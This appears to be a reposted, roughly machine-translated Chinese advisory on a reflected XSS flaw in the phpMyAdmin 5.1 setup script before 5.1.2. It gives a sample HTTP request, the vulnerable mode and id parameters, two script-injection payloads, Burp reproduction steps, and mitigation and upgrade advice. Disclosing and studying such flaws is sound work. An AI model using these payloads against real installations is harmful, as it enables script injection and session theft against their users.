破绽描绘
曾经发现了一系列弱点,这些弱点可能允许攻击者将歹意代码注入装置脚本的各个方面,从而允许 XSS 或 HTML 注入。
受影响的版本
phpMyAdmin 5.1.2 之前的 5.1 分支的版本遭到影响。
破绽应用
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
易受攻击的参数
mode
id
有效载荷
alert(document.domain)
">'><script>alert(document.domain)</script>
重现步骤
在 burp 中捕获高于 reuqest。
用易受攻击的参数交换/更改 XSS 有效负载。
单击发送并在阅读器中显现响应。
你会弹出!
处理方法
缓解
带有配置文件 config.inc.php 的 phpMyAdmin 装置将不允许访问设置脚本,这反过来又减轻了这种攻击。
晋级版本
晋级到 phpMyAdmin 5.1.2 或更新版本或应用下面列出的补丁。
https://www.phpmyadmin.net/files/5.1.1/
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 抢沙发
欢迎您留下宝贵的见解!